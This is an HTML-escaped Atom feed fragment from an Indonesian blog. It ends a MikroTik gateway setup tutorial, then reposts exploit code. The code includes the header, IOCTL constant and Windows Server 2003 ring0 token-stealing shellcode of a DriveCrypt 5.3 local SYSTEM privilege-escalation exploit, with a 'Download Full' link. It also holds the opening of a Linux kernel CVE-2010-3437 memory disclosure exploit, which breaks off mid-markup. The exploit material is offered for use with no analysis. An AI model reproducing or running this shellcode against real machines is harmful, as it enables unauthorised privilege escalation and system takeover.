/&gt;&lt;span class="fullpost"&gt;round-trip min/avg/max = 571/571.0/571 ms&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Jika sudah berhasil reply berarti seting DNS sudah benar.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine]&gt; ip firewall nat add action=masquerade outinterface=&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;ether1 chain:srcnat&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;15. Melihat konfigurasi Masquerading&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@killnine]&gt;ip firewall nat print&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Flags: X – disabled, I – invalid, D – dynamic&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;0 chain=srcnat out-interface=ether1 action=masquerade&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[admin@XAVIERO] &gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4543030705676337932?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/ZpiVAQU_itA" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4543030705676337932?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4543030705676337932?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/ZpiVAQU_itA/install-mikrotik-sebagai-gateway.html" title="Install Mikrotik Sebagai Gateway" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/install-mikrotik-sebagai-gateway.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkYAQHw9eip7ImA9Wx9WFUU.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1303479916960763628</id><published>2011-01-01T18:08:00.001+07:00</published><updated>2011-01-21T10:22:21.262+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-21T10:22:21.262+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux-Kernel" /><title>DriveCrypt  5.3 Local Kernel ring</title><content type="html">&lt;code class="cpp comments"&gt;/* drivecrypt-dcr.c&lt;/code&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Copyright (c) 2009 by &lt;mu-b@digit-labs.org&gt;&lt;/mu-b@digit-labs.org&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* DriveCrypt &lt;= 5.3 local kernel ring0 SYSTEM exploit&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* by mu-b - Sun 16 Aug 2009&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* - Tested on: DCR.sys&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Compile: MinGW + -lntdll&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*    - Private Source Code -DO NOT DISTRIBUTE -&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*/&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdio.h&gt;&lt;/stdio.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdlib.h&gt;&lt;/stdlib.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;windows.h&gt;&lt;/windows.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;ddk h=""&gt;&lt;/ddk&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#define DCR_IOCTL   0x00073800&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp keyword bold"&gt;static&lt;/code&gt; &lt;code class="cpp plain"&gt;unsigned &lt;/code&gt;&lt;code class="cpp color1 bold"&gt;char&lt;/code&gt; &lt;code class="cpp plain"&gt;win32_fixup[] =&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x89\xe5"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x81\xc5\xb4\x0c\x00\x00"&lt;/code&gt;&lt;code class="cpp plain"&gt;;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp comments"&gt;/* Win2k3 SP1/2 - kernel EPROCESS token switcher&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* by mu-b &lt;mu-b@digit-lab.org&gt;&lt;/mu-b@digit-lab.org&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*/&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp keyword bold"&gt;static&lt;/code&gt; &lt;code class="cpp plain"&gt;unsigned &lt;/code&gt;&lt;code class="cpp color1 bold"&gt;char&lt;/code&gt; &lt;code class="cpp plain"&gt;win2k3_ring0_shell[] =&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _ring0 */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\xb8\x24\xf1\xdf\xff"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\xb0\x18\x02\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x89\xf0"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _sys_eprocess_loop   */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\x98\x94\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x81\xfb\x04\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x74\x11"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\x80\x9c\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x2d\x98\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x39\xf0"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x75\xe3"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\xeb\x21"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _sys_eprocess_found  */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x89\xc1"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x89\xf0"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _cmd_eprocess_loop   */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\x98\x94\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x81\xfb\x00\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x74\x10"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x8b\x80\x9c\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x2d\x98\x00\x00\x00"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x39\xf0"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\x75\xe3"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _not_found           */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp string"&gt;"\xcc"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;  &lt;/code&gt;&lt;code class="cpp comments"&gt;/* _cmd_eprocess_found&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt;   &lt;/code&gt;&lt;code class="cpp comments"&gt;* _ring0_end           */&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;a href="http://www.exploit-db.com/exploits/15972/"&gt;&lt;span style="font-weight: bold;"&gt;Download Full&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1303479916960763628?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/gHrmlOQK5Vo" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1303479916960763628?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1303479916960763628?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/gHrmlOQK5Vo/drivecrypt-53-local-kernel-ring.html" title="DriveCrypt  5.3 Local Kernel ring" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/drivecrypt-53-local-kernel-ring.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUHRX88eSp7ImA9Wx9WEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-4247201541378107373</id><published>2010-12-28T18:19:00.000+07:00</published><updated>2011-01-17T18:20:34.171+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-17T18:20:34.171+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux-Kernel" /><title>Linux Kernel  2.6.36 Kernel Memory Disclosure</title><content type="html">&lt;code class="cpp comments"&gt;/*&lt;/code&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* cve-2010-3437.c&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Linux Kernel &lt;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Jon Oberheide &lt;jon@oberheide.org&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* http://jon.oberheide.org&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp 